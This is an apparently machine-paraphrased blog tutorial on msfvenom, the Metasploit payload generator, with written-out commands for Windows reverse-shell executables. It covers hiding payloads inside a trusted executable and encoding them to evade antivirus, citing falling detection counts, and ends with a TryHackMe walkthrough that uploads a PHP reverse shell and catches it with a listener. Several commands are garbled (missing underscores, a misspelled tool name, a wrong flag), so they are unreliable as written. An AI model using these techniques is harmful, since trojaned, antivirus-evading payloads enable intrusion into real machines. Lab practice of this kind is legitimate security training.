MsfVenom: What is it?
The Metasploit framework includes Deep Dive MSFVenom, a command-line payload generator. It is produced by combining msfpayload and msfencode. We can develop payloads using Deep Dive MSFVenom for any platform, including Linux, Windows, Android, IOS, BSD, Cisco, etc.
Not only that, but msfvenom can produce payloads in numerous other programming languages, including python, c, java, php, ruby, and more. The ability to create payloads for virtually any platform and the use of the encoder to render payloads invisible to defence systems are Deep Dive MSFVenom two main distinguishing characteristics.
Command Advancement
You should become familiar with the (-h) help menu as your first command. Each tool provides a description of its usage in the help menu. Observe this.
Command’msfvenom -h’ has been executed.
This is a description of all the command-line options available to Deep Dive MSFVenom. A brief description of them is also included.
We’ll demonstrate a few of them to you right now.
This flag is used to list every available module for msfvenom. such as formats, platforms, archs, encrypt, and payloads. You can just list all the payloads that are accessible and grep the payloads that contain PHP if you don’t know which payload you want to use but know some information, like the server runs PHP. In this manner, you can locate the required payload.
‘msfvenom -l payloads’ was entered as a command.
‘msfvenom payloads | grep PHP command was executed.
You should test out each alternative and see what they have to offer, in my opinion.
This can be an argument for looking into everything that exists, including payloads, encoders, nops, platforms, archs, encrypts, and formats (all).
‘msfvenom -l all’ was used as a command.
Please be aware that listing every module takes some time. Give it some time and be patient.
“-p payload”
To choose a particular payload, use this flag. You can use this flag to direct that payload when writing malicious or shell code once you’ve decided which payload to utilise against the target system.
Command: “msfvenom -p windows/meterpreter/reverse tcp LHOST=tun0 LPORT=31337 -f c” was successfully executed.
Other flags aren’t important right now, so ignore them. We’ll be meeting them soon.
–list-options
After the payload has been chosen, you might wish to review extra details to ensure that it is appropriate for your target. Use this flag only after selecting the payload. You can also use this to determine which arguments the payload needs. I’ve indicated as shown below using a rectangular shape.
Command: “msfvenom -p windows/meterpreter/reverse tcp -list-options” was executed.
“-f” “format-type”
To select the payload’s format, use this flag. Languages for programming can employ the same functionality. We can use an another programming language if one doesn’t run on the victim’s computer. We can choose binary extensions like exe in addition to programming languages.
Command: “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f python” was successfully executed.
Change the word “python” to “exe” if you intended this to be an executable file.
Command: “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f exe” was successfully executed.
Copy/paste won’t function with any binary output, please note. For output, you must use the (-o) option. As you can see from the mark, this flag defines a variable name. This is advantageous if we solely use the shell with our original exploit code. a buffer overrun, for instance.
The command “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 PORT=4444 -f python -v shellcode” was executed. By setting this flag, all shellcodes are directed to a user-defined file. When the binary-based extension’s format is chosen, this is most helpful. because binary files cannot be copied and pasted.
Command: “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f exe -o shell.exe” was successfully executed.
bad-characters -b
We regularly run into problematic characters when creating shells. Bad characters include “x00xa0” and other hexadecimal symbols. Bad characters prevent the execution of shell code. We can therefore use this to delete the specified problematic character from any shell code. Most buffer-overflow-style assaults can benefit from this.’
The stated bad characters have been eliminated, so even if you search the shellcode for them, nothing will turn up.
Command: “msfrvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f python -v shellcode -b “x00x1c”” was successfully executed.
“-n” “number”
The payloads must be encoded with some encoders by Deep Dive MSFVenom due to the problematic characters. And the shellcode automatically decodes itself in the target’s computer when the payload is performed. As a result of the shellcode expanding in size throughout this procedure, critical functionality is lost. Nops (No operations, or 0x90) can help you stay out of this predicament.
Note: Depending on how much the registers can handle, you can add whichever many nops you like. It’s not as if you must enter 90, like I did.
The addition of nops has also resulted in an increase in payload size as compared to before.
In addition, the result of subtracting the integers (after – before, 593 – 503) is 90. due to the fact that Deep Dive MSFVenomadded 90 bytes of nop as requested by us.
Following the execution of the command “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f python -v shellcode -b “x00x1c” -n 90,”
In the past, the command “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f python -v shellcode -b “x00x1c”” was executed.
‘x’ ‘coverfile-name’
The good executable that the victim is most likely to trust can be substituted for our malicious executable using this flag. In this way, when the victim executes it, he will believe it to be a regular executable, but in reality, our shell code will be run.
Command: “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f exe -x nc64.exe -o malicious-nc.exe” was successfully executed.
Additionally, this aids in getting past some antivirus defences. In order to understand, let’s look at the example below.
Employing a Cover File
The following command was run without a cover file: “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f exe -o uncover-nc.exe”.
It is clear how they vary. Only 33 anti-virus programmes detected it when the cover file was present, while 52 programmes did so when it wasn’t. Additionally, there is a chance that more antivirus would have been disregarded if we had simply substituted a regular, alternative exe file for nc.exe.
the encoder name, -e
There are numerous uses for the encoder. Anti-virus software can do everything from remove bad characters to hide a payload. By using the (-x) template exe file, you observed how various anti-virus programmes may be disregarded. Even more bypassing is possible with an encoder. Look at it.
Command: “msfvenom -p windows/x64/shell reverse tcp LHOST=tun0 LPORT=4444 -f exe -e x86/shikata ga nai -x nc64.exe -o malicious-encode-nc.exe” was successfully executed.
It is clear how they vary. Only 21 antivirus programmes were capable of detection. You’ll be amazed that renowned anti-virus programmes like Malwarebytes, drweb, McAfee, and others weren’t able to find it. It can be entirely avoided with a few additional techniques. But that can wait until another day.
LHOST && LOCAL IP
LHOST is not a msfvenom flag; whether or not you need to use it is entirely dependent upon the payload you are employing. The ‘-list-options’ options mentioned above can be used to verify this. In essence, you need an LHOST for everything that will connect you back. If you’re using a VPN, this will be your local host, and the IP for the VPN will be used instead.
LPORT is the listening port.
LHOST and LPORT are equivalent. Depending on the payload that you choose. This is the port that will be used for listening when the victim machine makes a connection.
The action of Deep Dive MSFVenom
I believe the knowledge of how to use MSFVenom was sound. Let’s now attempt to hack actual machines utilising the techniques you’ve just taught.
PHP Shell Reverse
For this demonstration, we’ll create a PHP reverse shell with msfvenom and connect to Metasploit and netcat (NC).
I’m using the tryhackme room RootME for this example. Also, you can give it a shot. You only need to register for an account on their site to access the room, which is totally free.
INFO: Port 80 on the machine is open. operating a basic website on Apache2. It has two directories panels, one of which includes an upload feature, and uploads (where the uploaded files save). Additionally, the upload function only accepts phtml files and rejects php files.
Command: “msfvenom -p php/reverse php LHOST=tun0 LPORT=1337 -o php-rev.phtml” was successfully executed.
The shell is here and upload it
You can find our shell in the uploads directory.
Just configure a listener in Metasploit at this point. additionally click the shell located in the uploads directory. There is a live connection.
Orders carried out:
- MSF Console – Q
- Utilize the exploit/multi/handler
- place lhost tun0
- make lport 1337
- php/reverse php as the payload
- run
We now have a shell in reverse. Play around with it some more and try to turn it into a meterpreter shell.
Using Netcat (NC), you can accomplish the same thing. All you have to do is configure a listener on the designated port.
‘nc -lnvp 1337’ was used as a command.
Final Remarks
Deep Dive MSFVenom has a wide range of additional uses. You now understand its intended use. Make your way through it using Google and reading documents.
Hope you liked it. Share your thoughts on this article with us. Until the next article is ready, take care. Continue to hack
